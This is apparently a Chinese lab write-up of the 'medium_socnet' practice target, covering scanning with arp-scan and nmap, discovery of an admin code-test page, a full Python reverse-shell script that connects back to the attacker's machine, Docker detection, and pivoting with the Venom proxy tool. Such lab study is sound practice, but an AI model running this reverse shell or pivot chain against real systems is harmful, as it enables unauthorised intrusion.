medium_socnet

0x00前言

靶场要安装在virtualbox (最新版)。否者会出现一些问题。

攻击机:kali2024

靶机:medium_socnet

0x01信息搜集

因为把靶机和虚拟机啊放在了同一网段。

所以我先使用了 arp-scan,查看有多少同一网段ipUP 。

经过推断,发现 192.168.56.103是靶机IP。

接下来就可以对目标进行端口扫描,看看开放了那些端口。对版本服务也进行一个识别。

-p- 全端口扫描

bash 复制代码
nmap -p- 192.168.56.103

发现目标靶机开发了两个端口

经过发现 5000 有httpd,可能是一个网站并且是python语言搭建的。所以前去查看。

进入发现的确是一个网站。如下图

经过测试发现没有页面没有扫描东西。但是给了一个网站肯定有一些用处。

所以,可以尝试用dirsearch 进行目录扫描。

发现存在admin

发现这是一个测试代码的界面,所以可以尝试 rce 反弹shell.

0x01反弹shell

因为python搭建的要用python反弹shell.

python 复制代码
import socket,os,subprocess
RHOST='192.168.56.105'  
RPORT=4444  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) 	# 连接攻击者
os.dup2(s.fileno(),0)		# 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]) 

kali监听端口

执行代码

查看是否成功,如下图即成功。

0x02怎么判断当前环境为docker 容器。

在查看目录下文件时发现Dockerfile,我们进到的环境可能是docker环境

查看根目录是否有此文件 .dockerenv如果有 90% 是docker环境。

2.cat /proc/1/cgroup

如果文件如图,必是docker

0x03从docker环境到宿主机

发现靶机内网ip 为172.17.0.3 所以先尝试扫描当前网段IP。看看是否有存活的IP。

for i in (seq 1 255);do ping -c 1 172.17.0.i;done

经过发现

存活IP有 .1 .2. 3 .所以我们要对 .1 .2 进行扫描

0x04内网穿透

工具

https://github.com/Dliv3/Venom/releases

让在kali直接使用工具扫描内网。需要先把客户端发给靶机 agent_linux_x64

可以在目录下开启一个httpd服务。

靶机获取文件

kali先启动服务端

靶机启动,成功链接

进入节点设置代理端口通过代理端口访问目标主机。

修改配置文件设置代理端口

扫描

proxychains nmap -Pn -sT -p9200 -sV 172.17.0.2

可以在kali上搜索目标框架有没有漏洞。

使用代码。

可能是代码环境问题。我成功反弹shell之后命令一直报错。多次试验结果都一样。所以这篇文章暂时就到这里了。

查看文件 passwd文件

可以先用网上的MD5工具,解开

完整版的请观看下面一位大佬写的文章。

Medium_socnet渗透测试(含docker容器) - FreeBuf网络安全行业门户

相关推荐
涛ing20 分钟前
32. C 语言 安全函数( _s 尾缀)
linux·c语言·c++·vscode·算法·安全·vim
大耳朵土土垚22 分钟前
【Linux】日志设计模式与实现
linux·运维·设计模式
学问小小谢25 分钟前
第26节课:内容安全策略(CSP)—构建安全网页的防御盾
运维·服务器·前端·网络·学习·安全
一ge科研小菜鸡1 小时前
网络安全实战指南:攻防技术与防御策略
网络
xrgs_shz1 小时前
MATLAB的数据类型和各类数据类型转化示例
开发语言·数据结构·matlab
yaoxin5211231 小时前
第十二章 I 开头的术语
运维·服务器
ProgramHan1 小时前
1992-2025年中国计算机发展状况:服务器、电脑端与移动端的演进
运维·服务器·电脑
来恩10034 小时前
C# 类与对象详解
开发语言·c#
马立杰4 小时前
H3CNE-33-BGP
运维·网络·h3cne